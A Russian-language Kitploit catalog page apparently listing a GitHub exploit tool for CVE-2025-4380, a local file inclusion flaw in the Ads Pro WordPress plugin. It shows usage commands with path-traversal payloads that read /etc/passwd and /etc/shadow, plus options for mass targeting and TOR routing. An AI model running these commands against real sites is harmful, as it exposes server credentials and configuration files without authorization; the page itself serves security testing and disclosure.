Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4380 | Kitploit
Инструменты/GitHubGitHub/r0otk3r/cve-2025-4380
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubr0otk3r/cve-2025-4380

CVE-2025-4380

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4380 - Эксплойт Local File Inclusion (LFI) для плагина Ads Pro <= 4.89

Описание

Этот Python-эксплойт нацелен на плагин Ads Pro ≤ 4.89 для WordPress, уязвимый к Local File Inclusion (LFI) через AJAX-действие bsa_preview_callback.

Неаутентифицированный злоумышленник может использовать эту уязвимость для чтения произвольных файлов из файловой системы сервера, включая такие чувствительные файлы, как /etc/passwd, wp-config.php и другие.


Возможности эксплойта

  • Эксплуатирует уязвимость LFI CVE-2025-4380.
  • Поддерживает одиночную цель или массовую эксплуатацию.
  • Сохраняет результаты в файл (опционально).
  • Поддерживает HTTP-прокси или маршрутизацию через TOR.
  • Механизм повторов для надёжности.

Использование

Одиночная цель

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd

Несколько целей (массовое сканирование)

root@kitploit:~
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow

Сохранение результата в файл

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt

Использование прокси (например, Burp, TOR)

root@kitploit:~
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080

Параметры


Пример

Screenshot_2025-07-20_18_42_08

Запрос/ответ Burpsuite

Screenshot_2025-07-20_18_42_45 Screenshot_2025-07-20_18_42_57

Ссылка на уязвимость

  • CVE-2025-4380

  • Плагин Ads Pro <= 4.89 - Local File Inclusion через bsa_template в bsa_preview_callback

⚠️ Отказ от ответственности

Этот эксплойт предоставлен только в образовательных целях и для авторизованного тестирования безопасности.


Официальные каналы

  • YouTube @rootctf
  • X @r0otk3r
Скачать инструмент
АргументОписаниеОбязателен
-u, --urlURL цели (например, http://target.com)Нет
-l, --listФайл со списком URL целейНет
-p, --pathПуть к файлу для включения (например, ../../etc/passwd)Да
-o, --outputФайл для сохранения результатовНет
--proxyПрокси (например, http://127.0.0.1:8080)Нет